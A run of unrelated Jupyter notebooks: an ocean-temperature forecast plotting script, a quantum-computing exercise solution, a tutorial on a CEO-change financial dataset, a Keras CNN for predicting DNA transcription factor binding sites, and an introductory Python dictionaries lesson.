start_stop(url,tvar)
except:
print '[problem accessing data]'
#model='Massbay_forecast_archive'
model='Massbay_forecast'
#model='GOM3_Forecast'
#model='GOM3_30_year_hindcast'
url=models[model]
# Desired time for snapshot
# ....right now (or some number of hours from now) ...
start = dt.datetime.utcnow() - dt.timedelta(hours=72)
stop = dt.datetime.utcnow() + dt.timedelta(hours=72)
# ... or specific time (UTC)
#start = dt.datetime(2004,9,1,0,0,0)
#stop = dt.datetime(2004,11,1,0,0,0)
def dms2dd(d,m,s):
return d+(m+s/60.)/60.
dms2dd(41,33,15.7)
dms2dd(42,51,17.40)
-dms2dd(70,30,20.2)
-dms2dd(70,18,42.0)
x = '''
Station, Lat, Lon
Falmouth Harbor, 41.541575, -70.608020
Sage Lot Pond, 41.554361, -70.505611
'''
x = '''
Station, Lat, Lon
Boston, 42.368186, -71.047984
Carolyn Seep Spot, 39.8083, -69.5917
Falmouth Harbor, 41.541575, -70.608020
'''
# Enter desired (Station, Lat, Lon) values here:
x = '''
Station, Lat, Lon
Boston, 42.368186, -71.047984
Scituate Harbor, 42.199447, -70.720090
Scituate Beach, 42.209973, -70.724523
Falmouth Harbor, 41.541575, -70.608020
Marion, 41.689008, -70.746576
Marshfield, 42.108480, -70.648691
Provincetown, 42.042745, -70.171180
Sandwich, 41.767990, -70.466219
Hampton Bay, 42.900103, -70.818510
Gloucester, 42.610253, -70.660570
'''
x = '''
Station, Lat, Lon
Buoy A, 42.52280, -70.56535
Buoy B, 43.18089, -70.42788
Nets, 42.85483, -70.3116
DITP, 42.347 , -70.960
'''
# Create a Pandas DataFrame
obs=pd.read_csv(StringIO(x.strip()), sep=",\s*",index_col='Station',engine='python')
obs
# find the indices of the points in (x,y) closest to the points in (xi,yi)
def nearxy(x,y,xi,yi):
ind = np.ones(len(xi),dtype=int)
for i in np.arange(len(xi)):
dist = np.sqrt((x-xi[i])**2+(y-yi[i])**2)
ind[i] = dist.argmin()
return ind
nc=netCDF4.Dataset(url)
# open NECOFS remote OPeNDAP dataset
ncv = nc.variables
# find closest NECOFS nodes to station locations
obs['0-Based Index'] = nearxy(ncv['lon'][:],ncv['lat'][:],obs['Lon'],obs['Lat'])
obs
ncv['lon'][0:10]
# get time values and convert to datetime objects
time_var = ncv['time']
istart = netCDF4.date2index(start,time_var,select='nearest')
istop = netCDF4.date2index(stop,time_var,select='nearest')
jd = netCDF4.num2date(time_var[istart:istop],time_var.units)
# get all time steps of water level from each station
# NOTE: this takes a while....
nsta=len(obs)
z = np.ones((len(jd),nsta))
layer = 0 # surface layer =0, bottom layer=-1
for i in range(nsta):
z[:,i] = ncv['temp'][istart:istop,layer,obs['0-Based Index'][i]]
# make a DataFrame out of the interpolated time series at each location
zvals=pd.DataFrame(z*9./5.+32.,index=jd,columns=obs.index)
# list out a few values
zvals.head()
# plotting at DataFrame is easy!
ax=zvals.plot(figsize=(16,4),grid=True,
title=('NECOFS Forecast Bottom Water Temperature from %s Grid' % model),legend=False);
# read units from dataset for ylabel
plt.ylabel(ncv['temp'].units)
# plotting the legend outside the axis is a bit tricky
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5));
# make a new DataFrame of maximum water levels at all stations
b=pd.DataFrame(zvals.idxmax(),columns=['time of max water temp (UTC)'])
# create heading for new column containing max water level
zmax_heading='tmax (%s)' % ncv['temp'].units
# Add new column to DataFrame
b[zmax_heading]=zvals.max()
b
```
| github_jupyter |
<table width="100%"> <tr>
<td style="background-color:#ffffff;">
<a href="http://qworld.lu.lv" target="_blank"><img src="..\images\qworld.jpg" width="35%" align="left"> </a></td>
<td style="background-color:#ffffff;vertical-align:bottom;text-align:right;">
prepared by Abuzer Yakaryilmaz (<a href="http://qworld.lu.lv/index.php/qlatvia/" target="_blank">QLatvia</a>)
<br>
updated by Özlem Salehi | December 1, 2019
</td>
</tr></table>
<table width="100%"><tr><td style="color:#bbbbbb;background-color:#ffffff;font-size:11px;font-style:italic;text-align:right;">This cell contains some macros. If there is a problem with displaying mathematical formulas, please run this cell to load these macros. </td></tr></table>
$ \newcommand{\bra}[1]{\langle #1|} $
$ \newcommand{\ket}[1]{|#1\rangle} $
$ \newcommand{\braket}[2]{\langle #1|#2\rangle} $
$ \newcommand{\dot}[2]{ #1 \cdot #2} $
$ \newcommand{\biginner}[2]{\left\langle #1,#2\right\rangle} $
$ \newcommand{\mymatrix}[2]{\left( \begin{array}{#1} #2\end{array} \right)} $
$ \newcommand{\myvector}[1]{\mymatrix{c}{#1}} $
$ \newcommand{\myrvector}[1]{\mymatrix{r}{#1}} $
$ \newcommand{\mypar}[1]{\left( #1 \right)} $
$ \newcommand{\mybigpar}[1]{ \Big( #1 \Big)} $
$ \newcommand{\sqrttwo}{\frac{1}{\sqrt{2}}} $
$ \newcommand{\dsqrttwo}{\dfrac{1}{\sqrt{2}}} $
$ \newcommand{\onehalf}{\frac{1}{2}} $
$ \newcommand{\donehalf}{\dfrac{1}{2}} $
$ \newcommand{\hadamard}{ \mymatrix{rr}{ \sqrttwo & \sqrttwo \\ \sqrttwo & -\sqrttwo }} $
$ \newcommand{\vzero}{\myvector{1\\0}} $
$ \newcommand{\vone}{\myvector{0\\1}} $
$ \newcommand{\vhadamardzero}{\myvector{ \sqrttwo \\ \sqrttwo } } $
$ \newcommand{\vhadamardone}{ \myrvector{ \sqrttwo \\ -\sqrttwo } } $
$ \newcommand{\myarray}[2]{ \begin{array}{#1}#2\end{array}} $
$ \newcommand{\X}{ \mymatrix{cc}{0 & 1 \\ 1 & 0} } $
$ \newcommand{\Z}{ \mymatrix{rr}{1 & 0 \\ 0 & -1} } $
$ \newcommand{\Htwo}{ \mymatrix{rrrr}{ \frac{1}{2} & \frac{1}{2} & \frac{1}{2} & \frac{1}{2} \\ \frac{1}{2} & -\frac{1}{2} & \frac{1}{2} & -\frac{1}{2} \\ \frac{1}{2} & \frac{1}{2} & -\frac{1}{2} & -\frac{1}{2} \\ \frac{1}{2} & -\frac{1}{2} & -\frac{1}{2} & \frac{1}{2} } } $
$ \newcommand{\CNOT}{ \mymatrix{cccc}{1 & 0 & 0 & 0 \\ 0 & 1 & 0 & 0 \\ 0 & 0 & 0 & 1 \\ 0 & 0 & 1 & 0} } $
$ \newcommand{\norm}[1]{ \left\lVert #1 \right\rVert } $
<h2> <font color="blue"> Solutions for </font>Probabilistic Operators</h2>
<a id="task3"></a>
<h3>Task 3</h3>
What is the new probabilistic state if the operator $ B = \mymatrix{ccc}{ 0.4 & 0.6 & 0 \\ 0.2 & 0.1 & 0.7 \\ 0.4 & 0.3 & 0.3 } $ is applied to the state $ \myvector{ 0.1 \\ 0.3 \\ 0.6 } $.
Please find the result by using matrix-vector multiplication.
Please do not use any python library for matrix-vector multiplication.
<i> The new probabilistic state should be $ \myvector{0.22 \\ 0.47 \\ 0.31} $. </i>
<h3>Solution</h3>
```
# operator B
B = [
[0.4,0.6,0],
[0.2,0.1,0.7],
[0.4,0.3,0.3]
]
# the current state
v = [0.1,0.3,0.6]
newstate = []
index = 0
for row in B:
newstate.append(0)
for i in range(len(row)):
newstate[index] = newstate[index] + row[i] * v[i]
index = index + 1
print(newstate)
# operator B
import numpy as np
B =np.matrix([
[0.4,0.6,0],
[0.2,0.1,0.7],
[0.4,0.3,0.3]
])
# the current state
v =np.matrix( [0.1,0.3,0.6])
print(B*v.transpose())
```
| github_jupyter |
# EventVestor: CEO Changes
In this notebook, we'll take a look at EventVestor's *CEO Changes* dataset, available on the [Quantopian Store](https://www.quantopian.com/store). This dataset spans January 01, 2007 through the current day.
### Blaze
Before we dig into the data, we want to tell you about how you generally access Quantopian Store data sets. These datasets are available through an API service known as [Blaze](http://blaze.pydata.org). Blaze provides the Quantopian user with a convenient interface to access very large datasets.
Blaze provides an important function for accessing these datasets. Some of these sets are many millions of records. Bringing that data directly into Quantopian Research directly just is not viable. So Blaze allows us to provide a simple querying interface and shift the burden over to the server side.
It is common to use Blaze to reduce your dataset in size, convert it over to Pandas and then to use Pandas for further computation, manipulation and visualization.
Helpful links:
* [Query building for Blaze](http://blaze.pydata.org/en/latest/queries.html)
* [Pandas-to-Blaze dictionary](http://blaze.pydata.org/en/latest/rosetta-pandas.html)
* [SQL-to-Blaze dictionary](http://blaze.pydata.org/en/latest/rosetta-sql.html).
Once you've limited the size of your Blaze object, you can convert it to a Pandas DataFrames using:
> `from odo import odo`
> `odo(expr, pandas.DataFrame)`
### Free samples and limits
One other key caveat: we limit the number of results returned from any given expression to 10,000 to protect against runaway memory usage. To be clear, you have access to all the data server side. We are limiting the size of the responses back from Blaze.
There is a *free* version of this dataset as well as a paid one. The free one includes about three years of historical data, though not up to the current day.
With preamble in place, let's get started:
```
# import the dataset
from quantopian.interactive.data.eventvestor import ceo_change
# or if you want to import the free dataset, use:
# from quantopian.data.eventvestor import ceo_change_free
# import data operations
from odo import odo
# import other libraries we will use
import pandas as pd
# Let's use blaze to understand the data a bit using Blaze dshape()
ceo_change.dshape
# And how many rows are there?
# N.B. we're using a Blaze function to do this, not len()
ceo_change.count()
# Let's see what the data looks like. We'll grab the first three rows.
ceo_change[:3]
```
Let's go over the columns:
- **event_id**: the unique identifier for this CEO Change.
- **asof_date**: EventVestor's timestamp of event capture.
- **trade_date**: for event announcements made before trading ends, trade_date is the same as event_date. For announcements issued after market close, trade_date is next market open day.
- **symbol**: stock ticker symbol of the affected company.
- **event_type**: this should always be *CEO Change*.
- **event_headline**: a short description of the event.
- **change_status**: indicates whether the change is a proposal or a confirmation.
- **change_scenario**: indicates if the CEO Change is *in*, *out*, or both.
- **change_type**: indicates if the incoming CEO is interim or permanent.
- **change_source**: is the incoming CEO an internal candidate, or recruited from the outside?
- **change_reason**: reason for the CEO transition
- **in_ceoname**: name of the incoming CEO
- **in_ceoname**: gender of the incoming CEO
- **out_ceoname**: name of the outgoing CEO
- **out_ceogender**: gender of the outgoing CEO
- **effective_date**: date as of which the CEO change is effective.
- **event_rating**: this is always 1. The meaning of this is uncertain.
- **timestamp**: this is our timestamp on when we registered the data.
- **sid**: the equity's unique identifier. Use this instead of the symbol.
We've done much of the data processing for you. Fields like `timestamp` and `sid` are standardized across all our Store Datasets, so the datasets are easy to combine. We have standardized the `sid` across all our equity databases.
We can select columns and rows with ease. Below, we'll fetch all entries for Microsoft. We're really only interested in the CEO coming in, the CEO going out, and the date, so we'll display only those columns.
```
# get the sid for MSFT
symbols('MSFT')
# knowing that the MSFT sid is 5061:
msft = ceo_change[ceo_change.sid==5061][['timestamp','in_ceoname', 'out_ceoname','change_status']].sort('timestamp')
msft
```
Note that the `in_ceoname` and `out_ceoname` in these cases were NaNs because there was a long transition period. Steve Ballmer announced his resignation on 2013-08-24, and formally stepped down on 2014-02-05.
Let's try another one:
```
# get the sid for AMD
sid_amd = symbols('AMD').sid
amd = ceo_change[ceo_change.sid==sid_amd][['timestamp','in_ceoname', 'out_ceoname','change_status']].sort('timestamp')
amd
```
Now suppose want to know how many CEO changes there were in the past year in which a female CEO was incoming.
```
females_in = ceo_change[ceo_change['in_ceogender']=='Female']
# Note that whenever you print a Blaze Data Object here, it will be automatically truncated to ten rows.
females_in = females_in[females_in.asof_date > '2014-09-17']
len(females_in)
```
Finally, suppose want this as a DataFrame:
```
females_in_df = odo(females_in, pd.DataFrame)
females_in_df.sort('symbol', inplace=True)
# let's get the first three rows
females_in_df[:3]
```
| github_jupyter |
<a href="https://colab.research.google.com/github/charlesreid1/deep-learning-genomics/blob/master/keras_sklearn_cnn1d_dna_transcription_logx.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Keras and Sklearn for Deep Learning Genomics
## Variation 1: Log Transform
This notebook is a variation on a prior notebook, `keras_sklearn_cnn1d_dna_transcription.ipynb` ([Jupyter notebook](https://github.com/charlesreid1/deep-learning-genomics/blob/master/keras_cnn1d_dna_transcription.ipynb) or [Google CoLab notebook](https://colab.research.google.com/github/charlesreid1/deep-learning-genomics/blob/master/keras_cnn1d_dna_transcription.ipynb#)). It continues with the example from a prior notebook, namely, the problem of predicting transcription factor binding sites in DNA. This type of neural network operates on 1D sequence data (DNA nucleotides), so we build a 1D convolutional neural network to perform classification of DNA (is this string of nucleotides a transcription factor binding site or not).
This notebook variation is to transform chromatin data into log space using a log transform, followed by a standard scaling transform (this ensures the log-transformed data has mean of 0 and variance of 1). The transformed data is then fed to the neural network instead of the raw chromatin coverage data. The log transform parameters are determined from the training data set and applied to the testing data set.
This notebook duplicates large sections from the `keras_sklearn_cnn1d_dna_transcription.ipynb`, so visit that notebook for details and explanations.
## Import Libraries
```
import tensorflow as tf
tf.test.gpu_device_name()
import os
import math
import numpy as np
import numpy
import matplotlib.pyplot as plt
import seaborn as sns
import joblib
# sklearn
from sklearn.model_selection import StratifiedKFold, StratifiedShuffleSplit
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import FunctionTransformer
from sklearn import preprocessing
from sklearn.pipeline import Pipeline
from sklearn.metrics import roc_curve, auc, roc_auc_score
from sklearn.metrics import confusion_matrix
from sklearn.utils import class_weight
from keras.models import Sequential, Model
from keras.layers import Flatten, Embedding, Dense, Dropout, Input, Concatenate
from keras.layers import Conv1D, GlobalAveragePooling1D, MaxPooling1D
import keras
seed = 1729
numpy.random.seed(seed)
```
## Define Useful Keras Metrics
```
# via https://github.com/keras-team/keras/issues/6507#issuecomment-322857357
import keras.backend as K
def precision(y_true, y_pred):
# Calculate the precision
# clip ensures we're between 0 and 1
# round ensures we're either 0 or 1
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
precision = true_positives / (predicted_positives + K.epsilon())
return precision
def recall(y_true, y_pred):
# Calculate the recall
# clip ensures we're between 0 and 1
# round ensures we're either 0 or 1
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
recall = true_positives / (possible_positives + K.epsilon())
return recall
def fvalue(y_true, y_pred):
# Calculate the F-value
# If there are no true positives, fix the F score at 0 like sklearn.
if K.sum(K.round(K.clip(y_true, 0, 1))) == 0:
return 0
p = precision(y_true,y_pred)
r = recall(y_true,y_pred)
fvalue = (2 * p * r)/(p + r + K.epsilon())
return fvalue
```
## Load Dataset
```
!git clone https://github.com/deepchem/DeepLearningLifeSciences.git
!ln -fs DeepLearningLifeSciences/Chapter06/{test*,train*,valid*} .
!ln -fs DeepLearningLifeSciences/Chapter06/chromatin.txt
def load_all_data():
# load chromatin accessibility data
accessibility = {}
for line in open('chromatin.txt','r'):
fields = line.split()
accessibility[fields[0]] = float(fields[1])
# load training, validation, and testing sets
for i,label in enumerate(['train','valid','test']):
datadir = "%s_dataset"%(label)
base_filename = "shard-0-%s.joblib"
X_filename = os.path.join(datadir,base_filename%("X"))
y_filename = os.path.join(datadir,base_filename%("y"))
w_filename = os.path.join(datadir,base_filename%("w"))
ids_filename = os.path.join(datadir,base_filename%("ids"))
this_X = joblib.load(X_filename)
this_y = joblib.load(y_filename)
this_w = joblib.load(w_filename)
this_ids = joblib.load(ids_filename)
this_chromatin = np.array([accessibility[k] for k in this_ids])
# add X and chromatin data
if i>0:
X = np.concatenate([X,this_X])
chromatin = np.concatenate([chromatin,this_chromatin])
y = np.concatenate([y,this_y])
w = np.concatenate([w,this_w])
ids = np.concatenate([ids,this_ids])
else:
X = this_X
chromatin = this_chromatin
y = this_y
w = this_w
ids = this_ids
# Don't transform chromatin data here!!!
# wait until we have our training/testing split
# (otherwise we will introduce bias)
return [X,chromatin], y, w, ids
[X,chromatin], y, w, ids = load_all_data()
print("Shape of all data:\n")
print("X shape:")
print(np.shape(X))
print("chromatin shape:")
print(np.shape(chromatin))
print("y shape:")
print(np.shape(y))
print("w shape:")
print(np.shape(w))
print(np.min(chromatin))
print(np.max(chromatin))
print(np.mean(chromatin))
```
## Get Class Weights for Training
```
classes = np.unique(y)
labels = np.squeeze(y)
weights = class_weight.compute_class_weight('balanced',classes,labels)
class_weights = {}
for c,w in zip(classes,weights):
class_weights[c] = w
print(class_weights)
```
## Stratified K-Fold Validation
```
def create_chromatin():
"""Create and return a 1D convolutional neural net model.
This model incorporates chromatin accessibility data.
"""
# DNA sequence alphabet size
n_features = 4
seq_length = 101
convolution_window = 10
n_filters = 16
# ----------------------------
# Sequence branch of network
# (1D DNA sequence)
# Input
seq_in = Input(shape=(seq_length,n_features))
# Fencepost pattern
seq = seq_in
# 3 convolutional layers
for i in range(3):
seq = Conv1D(n_filters, convolution_window,
activation='relu',
padding='same',
kernel_initializer='normal')(seq)
seq = Dropout(0.5)(seq)
# Flatten to 1D
seq = Flatten()(seq)
# Assemble the sequential branch of network
seq = keras.Model(inputs=seq_in, outputs=seq)
# ---------------------------
# Chromatin branch of network
# Input
chrom_input = Input(shape=(1,))
# ---------------------------
# Combine networks
fin = keras.layers.concatenate([seq.output, chrom_input])
fin = Dense(1,
kernel_initializer='normal',
activation='sigmoid')(fin)
chrom_model = keras.Model(inputs=[seq.input,chrom_input], outputs=fin)
# Compile model
chrom_model.compile(loss='binary_crossentropy',
optimizer='adam',
sample_weight_mode=None,
metrics=['accuracy',
precision,
recall,
fvalue])
return chrom_model
```
## Performing Cross Validation Manually (Transformed Data)
Next we perform cross-validation, incorporating class weights as in the example at the end of `keras_sklearn_cnn1d_dna_transcription.ipynb`.
We use a [StratifiedShuffleSplit](https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.StratifiedShuffleSplit.html#sklearn.model_selection.StratifiedShuffleSplit) object again to create our test/train splits.
```
n_fold = 3
# we can use either of these,
# but we'll opt for shuffle
kfold = StratifiedKFold(n_splits=n_fold,
shuffle=True,
random_state=seed)
shuffle = StratifiedShuffleSplit(n_splits=n_fold,
train_size = 0.7,
test_size = 0.3,
random_state = seed)
```
### Visualizing the Log Transform
Let's first examine what the log transform will do to this data set:
```
fig, axes = plt.subplots(2,3,figsize=(14,6))
for ifold, (train_ix, test_ix) in enumerate(shuffle.split(X,y)):
X_train, X_test = X[train_ix], X[test_ix]
y_train, y_test = y[train_ix], y[test_ix]
chrom_train, chrom_test = np.squeeze(chromatin[train_ix]), np.squeeze(chromatin[test_ix])
lab_test = 'Fold %d (Test)'%(ifold+1)
lab_train = 'Fold %d (Train)'%(ifold+1)
# Row 0 is the untransformed data:
sns.distplot(chrom_test, ax=axes[0,ifold],
label=lab_test,
kde=False,
norm_hist=True,
hist_kws={'alpha':0.2,"color": "b"})
sns.distplot(chrom_train, ax=axes[0,ifold],
label=lab_train,
kde=False,
norm_hist=True,
hist_kws={'alpha':0.2,"color": "r"})
########################################
# Perform log transform
logfunc = lambda x : np.log(x+1e-6)
logx = FunctionTransformer(logfunc, validate=True)
stdx = StandardScaler()
pipe = Pipeline([('logx',logx),('stdx',stdx)])
chromx_train = pipe.fit_transform(chrom_train.reshape(-1,1))
chromx_test = pipe.transform(chrom_test.reshape(-1,1))
########################################
# Row 1 is the transformed data:
sns.distplot(chromx_test, ax=axes[1,ifold],
label=lab_test,
kde=False,
norm_hist=True,
hist_kws={'alpha':0.2,"color": "b"})
sns.distplot(chromx_train, ax=axes[1,ifold],
label=lab_train,
kde=False,
norm_hist=True,
hist_kws={'alpha':0.2,"color": "r"})
axes[0,ifold].legend()
axes[1,ifold].legend()
axes[0,1].set_title('Distribution of Chromatin Coverage Values:\nUntransformed Data')
axes[1,1].set_title('Distribution of Chromatin Coverage Values:\nLog-Transformed Data')
plt.tight_layout()
plt.show()
n_epochs = 50
batch_size = 2048
include_chromatin_data = True
transformers = []
models = []
fithists = []
for ifold, (train_ix, test_ix) in enumerate(shuffle.split(X,y)):
X_train, X_test = X[train_ix], X[test_ix]
y_train, y_test = y[train_ix], y[test_ix]
chrom_train, chrom_test = np.squeeze(chromatin[train_ix]), np.squeeze(chromatin[test_ix])
########################################
# Perform log transform
logfunc = lambda x : np.log(x+1e-6)
logx = FunctionTransformer(logfunc, validate=True)
stdx = StandardScaler()
pipe = Pipeline([('logx',logx),('stdx',stdx)])
chromx_train = pipe.fit_transform(chrom_train.reshape(-1,1))
chromx_test = pipe.transform(chrom_test.reshape(-1,1))
########################################
print("Training on fold %d..."%(ifold+1))
# if we use the chromatin model,
# we need to provide the network
# with a *list* of inputs
if include_chromatin_data:
model = create_chromatin()
hist = model.fit([X_train,chromx_train], y_train,
class_weight = class_weights,
batch_size = batch_size,
epochs = n_epochs,
verbose = 0,
validation_data=([X_test,chromx_test],y_test))
else:
model = create_baseline()
hist = model.fit(X_train, y_train,
class_weight = class_weights,
batch_size = batch_size,
epochs = n_epochs,
verbose = 0,
validation_data=(X_test,y_test))
transformers.append(pipe)
models.append(model)
fithists.append(hist)
print("Done")
print("Model results (validation):")
print("\n")
print("Loss (Mean): %0.4f"%(np.mean([h.history['val_loss'] for h in fithists])))
print("Loss (Std): %0.4f"%(np.std([h.history['val_loss'] for h in fithists])))
print("\n")
print("Accuracy (Mean): %0.2f%%"%(100*np.mean([h.history['val_acc'] for h in fithists])))
print("Accuracy (Std): %0.2f%%"%(100*np.std([h.history['val_acc'] for h in fithists])))
print("\n")
print("Precision (Mean): %0.2f%%"%(100*np.mean([h.history['val_precision'] for h in fithists])))
print("Precision (Std): %0.2f%%"%(100*np.std([h.history['val_precision'] for h in fithists])))
print("\n")
print("Recall (Mean): %0.2f%%"%(100*np.mean([h.history['val_recall'] for h in fithists])))
print("Recall (Std): %0.2f%%"%(100*np.std([h.history['val_recall'] for h in fithists])))
def loss_rate_plot(hist, ax, label='',legend=False):
ax.plot(hist.history['loss'])
ax.plot(hist.history['val_loss'])
if label=='':
ax.set_title("Loss Rate", size=14)
else:
ax.set_title("Loss Rate (%s)"%(label), size=14)
ax.set_ylabel('Loss')
ax.set_xlabel('Training interations')
if legend:
ax.legend(['Training', 'Validation'], loc='upper right')
def accuracy_rate_plot(hist,ax,label='',legend=False):
ax.plot([j*100 for j in hist.history['acc']])
ax.plot([j*100 for j in hist.history['val_acc']])
if label=='':
ax.set_title("Accuracy", size=14)
else:
ax.set_title("Accuracy (%s)"%(label), size=14)
ax.set_ylabel('Accuracy %')
ax.set_xlabel('Training iterations')
if legend:
ax.legend(['Training','Validation'], loc='lower right')
def precision_rate_plot(hist,ax,label='',legend=False):
ax.plot([j*100 for j in hist.history['precision']])
ax.plot([j*100 for j in hist.history['val_precision']])
if label=='':
ax.set_title("Precision", size=14)
else:
ax.set_title("Precision (%s)"%(label), size=14)
ax.set_ylabel('Precision %')
ax.set_xlabel('Training iterations')
if legend:
ax.legend(['Training','Validation'], loc='lower right')
def recall_rate_plot(hist,ax,label='',legend=False):
ax.plot([j*100 for j in hist.history['recall']])
ax.plot([j*100 for j in hist.history['val_recall']])
if label=='':
ax.set_title("Recall", size=14)
else:
ax.set_title("Recall (%s)"%(label), size=14)
ax.set_ylabel('Recall %')
ax.set_xlabel('Training iterations')
if legend:
ax.legend(['Training','Validation'], loc='lower right')
for i in range(shuffle.get_n_splits()):
fig, [[ax1,ax2],[ax3,ax4]] = plt.subplots(2,2, figsize=(8,6))
loss_rate_plot(fithists[i], ax1, legend=True, label="Fold %d"%(i+1))
accuracy_rate_plot(fithists[i], ax2, label="Fold %d"%(i+1))
precision_rate_plot(fithists[i], ax3, label="Fold %d"%(i+1))
recall_rate_plot(fithists[i], ax4, label="Fold %d"%(i+1))
fig.tight_layout()
plt.show()
def plot_confusion_matrix(y_true, y_pred, classes,
title=None,
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
"""
if not title:
title = 'Confusion matrix'
# Compute confusion matrix
cm = confusion_matrix(y_true, y_pred)
print('Confusion matrix:')
print(cm)
fig, ax = plt.subplots()
im = ax.imshow(cm, interpolation='nearest', cmap=cmap)
ax.figure.colorbar(im, ax=ax)
# We want to show all ticks...
ax.set(xticks=np.arange(cm.shape[1]),
yticks=np.arange(cm.shape[0]),
# ... and label them with the respective list entries
xticklabels=classes, yticklabels=classes,
title=title,
ylabel='True label',
xlabel='Predicted label')
# Rotate the tick labels and set their alignment.
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
# Loop over data dimensions and create text annotations.
fmt = ','
thresh = cm.max() / 2.
for i in range(cm.shape[0]):
for j in range(cm.shape[1]):
ax.text(j, i, format(cm[i, j], fmt),
ha="center", va="center",
color="white" if cm[i, j] > thresh else "black")
fig.tight_layout()
return ax
for ifold, (train_ix, test_ix) in enumerate(shuffle.split(X,y)):
print("---------------")
print("Confusion Matrix - Fold %d:"%(ifold+1))
X_train, X_test = X[train_ix], X[test_ix]
y_train, y_test = y[train_ix], y[test_ix]
chrom_train, chrom_test = chromatin[train_ix], chromatin[test_ix]
transformer = transformers[ifold]
##########################
# apply power transformer
chromx_train = transformer.transform(chrom_train.reshape(-1,1))
chromx_test = transformer.transform(chrom_test.reshape(-1,1))
##########################
model = models[ifold]
if include_chromatin_data:
y_test_pred = model.predict([X_test,chromx_test])
else:
y_test_pred = model.predict(X_test)
y_test_pred = np.round(y_test_pred)
ax = plot_confusion_matrix(y_test, y_test_pred, ['0','1'], title="Confusion Matrix - Fold %d"%(ifold+1))
```
Finally, we compute the ROC curve for all k models from the k-fold cross-validation and use those curves to assemble the mean and variance of the ROC curve at every point by assuming the samples come from a normal distribution (equivalent to assuming the error in the model is normally distributed). See [ROC with cross validation example](https://scikit-learn.org/stable/auto_examples/model_selection/plot_roc_crossval.html) in the sklearn documentation.
```
def plot_roc_curve(y_true, y_pred, weights):
fpr, tpr, _ = roc_curve(y_true, y_pred)#,
#sample_weight = weights)
fig, ax = plt.subplots()
ax.plot(fpr, tpr, label='ROC curve (area = %0.2f)' % roc_auc_score(y_true, y_pred))
ax.set_xlabel('False Positive Rate')
ax.set_ylabel('True Positive Rate')
ax.plot([0,1],[0,1],'k--')
ax.set_title("ROC Curve")
plt.legend(loc='lower right')
plt.show()
fig.tight_layout()
return ax
# https://scikit-learn.org/stable/auto_examples/model_selection/plot_roc_crossval.html
from scipy import interp
fig, ax = plt.subplots(1,1,figsize=(8,8))
tprs = []
aucs = []
mean_fpr = np.linspace(0,1,100)
for ifold, (train_ix, test_ix) in enumerate(shuffle.split(X,y)):
print("Working on fold %d..."%(ifold+1))
X_train, X_test = X[train_ix], X[test_ix]
y_train, y_test = y[train_ix], y[test_ix]
chrom_train, chrom_test = chromatin[train_ix], chromatin[test_ix]
model = models[ifold]
if include_chromatin_data:
y_test_pred = model.predict([X_test,chrom_test]).ravel()
else:
y_test_pred = model.predict(X_test).ravel()
fpr, tpr, thresholds = roc_curve(y_test, y_test_pred)
tprs.append(interp(mean_fpr,fpr,tpr))
tprs[-1][0] = 0.0
roc_auc = auc(fpr,tpr)
aucs.append(roc_auc)
ax.plot(fpr,tpr, alpha=0.3)
mean_tpr = np.mean(tprs,axis=0)
mean_tpr[-1] = 1.0
mean_auc = auc(mean_fpr, mean_tpr)
std_auc = np.std(aucs)
ax.plot(mean_fpr, mean_tpr, color='b', alpha=0.8)
std_tpr = np.std(tprs, axis=0)
tprs_upper = np.minimum(mean_tpr + std_tpr, 1)
tprs_lower = np.maximum(mean_tpr - std_tpr, 0)
ax.fill_between(mean_fpr, tprs_lower, tprs_upper, color='grey', alpha=0.2)
ax.plot([0,1],[0,1],'--k',lw=2)
ax.set_title('ROC Curve, 1D CNN With Chromatin')
print("Area under curve:")
print("Mean: %0.4f"%(mean_auc))
print("Std: %0.4f"%(std_auc))
plt.show()
```
| github_jupyter |
# Dictionaries
We've been learning about *sequences* in Python but now we're going to switch gears and learn about *mappings* in Python. If you're familiar with other languages you can think of these Dictionaries as hash tables.
This section will serve as a brief introduction to dictionaries and consist of:
1.) Constructing a Dictionary
2.) Accessing objects from a dictionary
3.) Nesting Dictionaries
4.) Basic Dictionary Methods
So what are mappings? Mappings are a collection of objects that are stored by a *key*, unlike a sequence that stored objects by their relative position. This is an important distinction, since mappings won't retain order since they have objects defined by a key.
A Python dictionary consists of a key and then an associated value. That value can be almost any Python object.
## Constructing a Dictionary
Let's see how we can construct dictionaries to get a better understanding of how they work!
```
# Make a dictionary with {} and : to signify a key and a value
my_dict = {'key1':'value1','key2':'value2'}
# Call values by their key
my_dict['key2']
```
Its important to note that dictionaries are very flexible in the data types they can hold. For example:
```
my_dict = {'key1':123,'key2':[12,23,33],'key3':['item0','item1','item2']}
#Lets call items from the dictionary
my_dict['key3']
# Can call an index on that value
my_dict['key3'][0]
#Can then even call methods on that value
my_dict['key3'][0].upper()
```
We can effect the values of a key as well. For instance:
```
my_dict['key1']
# Subtract 123 from the value
my_dict['key1'] = my_dict['key1'] - 123
#Check
my_dict['key1']
```
A quick note, Python has a built-in method of doing a self subtraction or addition (or multiplication or division). We could have also used += or -= for the above statement. For example:
```
# Set the object equal to itself minus 123
my_dict['key1'] -= 123
my_dict['key1']
```
We can also create keys by assignment. For instance if we started off with an empty dictionary, we could continually add to it:
```
# Create a new dictionary
d = {}
# Create a new key through assignment
d['animal'] = 'Dog'
# Can do this with any object
d['answer'] = 42
#Show
d
```
## Nesting with Dictionaries
Hopefully you're starting to see how powerful Python is with its flexibility of nesting objects and calling methods on them. Let's see a dictionary nested inside a dictionary:
```
# Dictionary nested inside a dictionary nested in side a dictionary
d = {'key1':{'nestkey':{'subnestkey':'value'}}}
```
Wow! That's a quite the inception of dictionaries! Let's see how we can grab that value:
```
# Keep calling the keys
d['key1']['nestkey']['subnestkey']
```
## A few Dictionary Methods
There are a few methods we can call on a dictionary. Let's get a quick introduction to a few of them:
```
# Create a typical dictionary
d = {'key1':1,'key2':2,'key3':3}
# Method to return a list of all keys
d.keys()
# Method to grab all values
d.values()
